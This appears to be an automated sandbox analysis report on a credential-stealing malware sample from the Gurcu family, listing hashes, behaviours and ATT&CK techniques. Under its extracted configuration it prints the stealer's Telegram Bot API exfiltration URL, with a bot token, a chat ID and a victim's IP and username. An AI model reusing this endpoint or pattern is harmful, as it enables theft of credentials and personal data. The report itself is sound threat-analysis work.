General
Target: b-crypted.exe
Size: 8.4MB
Sample: 241207-w4qp1ssrbr
MD5: b45f3a137a961c8498ee21a246e983ec
SHA1: f7a2dc2bac844aad018498f224adf51f285c1f1b
SHA256: 17cc88b4f9976d16cc5c807e91b034fecc721f9988cc52e2056a01e99aabc900
SHA512: ee339e5f4853c425d838493aa9fdac55273601482b804be183367118832d4677375daa46e08755d1f472725cb9d35612e570095f1afffe3db1d336fb139d20bc
SSDEEP: 196608:HWIWSNScyO62XEXOV7QUY1MlROz8Uk2Ew2GdKxvY7n7wls8bg:NWSBybi7qelRc8UFAGwxAGs80
Static task: static1
Malware Config
Extracted (gurcu):
https://api.telegram.org/bot6031927554:AAEXTw-Bhx5o5i_JojmzmJzXPmNMBfive_Y/sendDocument?chat_id=918093463&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
Targets
Target: b-crypted.exe
- Gurcu family
- Checks computer location settings: looks up the country code configured in the registry, likely a geofence.
- Executes dropped EXE
- Loads dropped DLL
- Legitimate hosting services abused for malware hosting/C2
- Looks up external IP address via web service: uses a legitimate IP lookup service to find the infected system's external IP.
- Enumerates processes with tasklist
- Suspicious use of SetThreadContext
MITRE ATT&CK Enterprise v15
Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Unsecured Credentials (1)
  - Credentials In Files (1)